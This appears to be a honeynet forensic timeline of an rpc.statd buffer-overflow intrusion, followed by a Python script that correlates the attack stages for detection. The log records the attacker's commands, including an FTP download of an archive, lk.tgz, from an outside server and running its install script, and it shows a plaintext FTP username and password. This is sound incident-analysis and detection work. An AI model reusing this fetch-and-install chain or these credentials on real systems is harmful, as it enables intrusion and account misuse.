Timeline of the events that took place, as recorded in snort-0315@0005.log
| Time (hh:mm:ss) | Event |
|---|---|
| 20:21:23 | The host 211.185.125.124 performed a SYN scan on TCP port 111 of all hosts in this honeynet; both 172.16.1.103 and 172.16.1.108 responded with a SYN-ACK. |
| 20:21:24 | The host 211.185.125.124 sent an "RPC GETPORT Call" query to the host 172.16.1.103. |
| | The host 172.16.1.103 replied with an "RPC GETPORT Reply" packet to the host 211.185.125.124, indicating that its rpc.statd is listening on UDP port 32773. |
| | The host 211.185.125.124 sent a malformed STAT request to UDP port 32773 of the host 172.16.1.103. |
| | The host 172.16.1.103 replied to the STAT request sent by the host 211.185.125.124, stating that the request failed. |
| 20:21:25 | The host 211.185.125.124 sent an "RPC GETPORT Call" query to the host 172.16.1.108. |
| | The host 172.16.1.108 replied to the "RPC GETPORT Call" with an "RPC GETPORT Reply", telling the host 211.185.125.124 that its RPC port is listening on UDP port 931. |
| | The host 211.185.125.124 sent a malformed STAT request to port 931 of the host 172.16.1.108, attempting to buffer-overflow rpc.statd. |
| 20:21:26 | The host 211.185.125.124 performed yet another SYN scan on TCP port 111, but this time only the hosts that had not responded previously were scanned. |
| 20:21:27 | The host 211.185.125.124 sent yet another malformed STAT request to port 931 of the host 172.16.1.108, attempting to buffer-overflow rpc.statd. |
| 20:21:29 | The host 211.185.125.124 sent yet another malformed STAT request to port 931 of the host 172.16.1.108, attempting to buffer-overflow rpc.statd. |
| 20:21:32 | The host 211.185.125.124 performed a SYN scan identical to the one launched at 20:21:26. |
| 20:21:36 | The cracker launched the actual TCP connection to port 39168 and executed the command "cd /; uname -a; id;". |
| 20:36:04 | The cracker executed the command "ftp -v ftp.home.ro". |
| 20:36:05 | ftp.home.ro performed an ident request to get the list of who was currently logged on to the host 172.16.1.108. |
| 20:36:07 | ftp.home.ro performed another ident request to get the list of who was currently logged on to the host 172.16.1.108. |
| 20:36:08 | ftp.home.ro prompted the cracker for a user name for the FTP connection. |
| 20:36:12 | The cracker entered the user name "soane" as the login name for the FTP connection. |
| | ftp.home.ro prompted the cracker for the password of the user name "soane". |
| 20:36:16 | The cracker entered the password "i2ttgcj1d". |
| 20:36:20 | The cracker executed the command "get lk.tgz". |
| 20:36:21 | ftp.home.ro acknowledged that the command was entered successfully and initiated the download of the file lk.tgz. |
| 20:36:57 | The transfer of the file lk.tgz was completed. |
| 20:40:55 | The FTP connection to ftp.home.ro was terminated by ftp.home.ro, since it had been idle for more than 240 seconds. |
| 20:44:51 | The cracker exited the FTP client application by executing the command "bye". |
| 20:44:59 | The cracker executed the command "tar -z xvf lk.tgz". |
| 20:45:00 | The extraction of lk.tgz completed. |
| 20:45:08 | The cracker executed the command "cd last". |
| 20:45:11 | The cracker executed the command "./install". |
| 20:45:14 | The installation script completed. |
| 20:45:18 | The cracker terminated the connection to the host 172.16.1.108. |
| 20:46:15 | The host 172.16.1.108 initiated an SMTP connection to mta502.mail.yahoo.com to deliver the mail message for bidi_damm@yahoo.com. |
| 20:46:16 | This SMTP mail delivery was completed and the SMTP connection terminated. The transcript of this delivery is attached. |
| 20:46:24 | The host 172.16.1.108 initiated an SMTP connection to spf2.us3.outblaze.com to deliver the mail message for last@linuxmail.org. |
| 20:46:25 | This SMTP mail delivery was aborted by the receiving host, which complained that the domain asdf1 (from the sender's email address root@asdf1) does not exist. The transcript of this delivery is also attached. |
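As an added example (not part of the original analysis), the intrusion chain in this timeline expressed as a simple correlation over event lines: a victim is flagged only when the portmapper query, the rpc.statd request and the follow-up TCP connection to port 39168 all occur from the same source, and that victim's later outbound connections are then listed as post-compromise indicators. The line format, the `SAMPLE_EVENTS` (constructed to mirror the timeline, not the raw snort log) and the stage predicates are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample events shaped after the timeline above (not raw snort output).
# Format: "HH:MM:SS src -> dst proto/port description"
SAMPLE_EVENTS = """\
20:21:23 211.185.125.124 -> 172.16.1.0/24 tcp/111 SYN scan
20:21:24 211.185.125.124 -> 172.16.1.103 udp/111 RPC GETPORT Call
20:21:24 211.185.125.124 -> 172.16.1.103 udp/32773 malformed STAT request
20:21:25 211.185.125.124 -> 172.16.1.108 udp/111 RPC GETPORT Call
20:21:25 211.185.125.124 -> 172.16.1.108 udp/931 malformed STAT request
20:21:27 211.185.125.124 -> 172.16.1.108 udp/931 malformed STAT request
20:21:36 211.185.125.124 -> 172.16.1.108 tcp/39168 shell connection
20:36:04 172.16.1.108 -> ftp.home.ro tcp/21 outbound FTP
20:46:15 172.16.1.108 -> mta502.mail.yahoo.com tcp/25 outbound SMTP
"""

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+) (tcp|udp)/(\d+) (.+)$")

# Ordered stages of the intrusion; each predicate inspects (proto, port, description).
STAGES = [
    ("portmap_query", lambda proto, port, desc: port == 111 and "GETPORT" in desc),
    ("statd_request", lambda proto, port, desc: proto == "udp" and port != 111 and "STAT" in desc),
    ("shell_connect", lambda proto, port, desc: proto == "tcp" and port == 39168),
]

def parse(text):
    """Parse event lines into (ts, src, dst, proto, port, desc) tuples; skip unparsable lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, dst, proto, port, desc = m.groups()
            events.append((ts, src, dst, proto, int(port), desc))
    return events

def correlate(events):
    """Return (compromised, outbound): compromised maps (attacker, victim) to the
    [(stage, ts)] list for pairs that reached every stage in order; outbound maps
    each such victim to its later connections [(ts, dst, port)]."""
    progress = defaultdict(list)
    for ts, src, dst, proto, port, desc in events:
        key = (src, dst)
        nxt = len(progress[key])            # index of the next stage still unmatched
        if nxt < len(STAGES) and STAGES[nxt][1](proto, port, desc):
            progress[key].append((STAGES[nxt][0], ts))
    compromised = {k: p for k, p in progress.items() if len(p) == len(STAGES)}
    victims = {victim for (_, victim) in compromised}
    outbound = defaultdict(list)
    for ts, src, dst, proto, port, desc in events:
        if src in victims:
            outbound[src].append((ts, dst, port))
    return compromised, dict(outbound)
```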